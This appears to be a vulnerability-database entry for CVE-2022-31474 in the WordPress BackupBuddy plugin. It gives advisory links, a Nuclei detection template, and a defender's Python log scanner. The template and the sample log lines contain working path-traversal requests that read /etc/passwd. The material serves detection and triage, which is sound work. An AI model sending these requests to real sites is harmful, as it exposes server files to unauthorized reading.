| Title | Published | Views | Reporter |
|---|---|---|---|
| WordPress BackupBuddy 8.7.4.1 Arbitrary File Read Vulnerability | 8 Sep 2022 00:00 | – | zdt |
| CVE-2022-31474 | 13 Mar 2023 14:15 | – | attackerkb |
| CVE-2022-31474 | 9 Sep 2022 11:10 | – | circl |
| WordPress plugin BackupBuddy path traversal vulnerability | 7 Sep 2022 00:00 | – | cnnvd |
| WordPress BackupBuddy Plugin Arbitrary File Read (CVE-2022-31474) | 12 Sep 2022 00:00 | – | checkpoint_advisories |
| CVE-2022-31474 | 13 Mar 2023 13:21 | – | cve |
| CVE-2022-31474 WordPress BackupBuddy Plugin 8.5.8.0-8.7.4.1 is vulnerable to Directory Traversal | 13 Mar 2023 13:21 | – | cvelist |
| Zero-day Vulnerability in the WordPress BackupBuddy Plugin | 14 Sep 2022 14:32 | – | hivepro |
| BackupBuddy WordPress plugin vulnerable to exploitation, update now! | 13 Sep 2022 12:00 | – | malwarebytes |
| CVE-2022-31474 | 13 Mar 2023 14:15 | – | nvd |
```yaml
id: CVE-2022-31474

info:
  name: BackupBuddy - Local File Inclusion
  author: aringo
  severity: high
  description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
  remediation: Upgrade to at least version 8.7.5 or higher
  reference:
    - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
    - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
    - https://ithemes.com/backupbuddy/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
    - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31474
    cwe-id: CWE-22
    epss-score: 0.63761
    epss-percentile: 0.99119
    cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: ithemes
    product: backupbuddy
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002e3383b69fd3b44a66c62c91c1fc7632c98ad1b20c065ea3dc1659ac8ec226f022100adfc7d15de79b1688354eb915d5c29d0773a44c526e02df3230e5bb809af14d7:922c64590222798bb761d5b6d8e72950
```
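For defender-side log triage, here is an added example (my own code, not part of the Vulners page or the Nuclei project) that scans access-log lines for the same request shape the template above checks: `admin-post.php` with `page=pb_backupbuddy_destinations` and a `local-download` or `local-destination-id` value that is an absolute path or contains a `..` segment. It goes a little beyond the template's single probe by also catching URL-encoded relative traversal; the log lines and IP addresses are constructed for the demonstration.

```python
"""Flag web-server log entries that match the request shape checked by the
Nuclei template above (CVE-2022-31474), for defender-side log triage."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Request field of a combined-format access log: "METHOD /path?query HTTP/x.y"
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
_SUSPECT_PARAMS = ("local-download", "local-destination-id")


def is_backupbuddy_traversal(target: str) -> bool:
    """True when a request target matches the CVE-2022-31474 probe shape:
    admin-post.php, page=pb_backupbuddy_destinations, and a download or
    destination parameter carrying an absolute path or a '..' segment."""
    parsed = urlparse(target)
    if not parsed.path.endswith("/wp-admin/admin-post.php"):
        return False
    query = parse_qs(parsed.query, keep_blank_values=True)
    if query.get("page") != ["pb_backupbuddy_destinations"]:
        return False
    for name in _SUSPECT_PARAMS:
        for value in query.get(name, []):
            value = unquote(value)  # parse_qs decoded once; catch double-encoding
            if value.startswith("/") or ".." in value:
                return True
    return False


def scan_log(lines):
    """Return (line_number, client_ip, request_target) for each suspect entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if m and is_backupbuddy_traversal(m.group("target")):
            hits.append((n, line.split()[0], m.group("target")))
    return hits


# Constructed sample log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Sep/2022:10:01:02 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd HTTP/1.1" 200 1832',
    '198.51.100.4 - - [07/Sep/2022:10:01:05 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-download=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1832',
    '192.0.2.9 - - [07/Sep/2022:10:02:11 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-download=backup-2022.zip HTTP/1.1" 200 9991',
    '192.0.2.9 - - [07/Sep/2022:10:02:12 +0000] "GET /wp-login.php HTTP/1.1" 200 4400',
]

if __name__ == "__main__":
    for n, ip, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {target}")
```

A legitimate download of a backup archive by name (third sample line) is not flagged, so the check can run over full logs without drowning in normal plugin traffic.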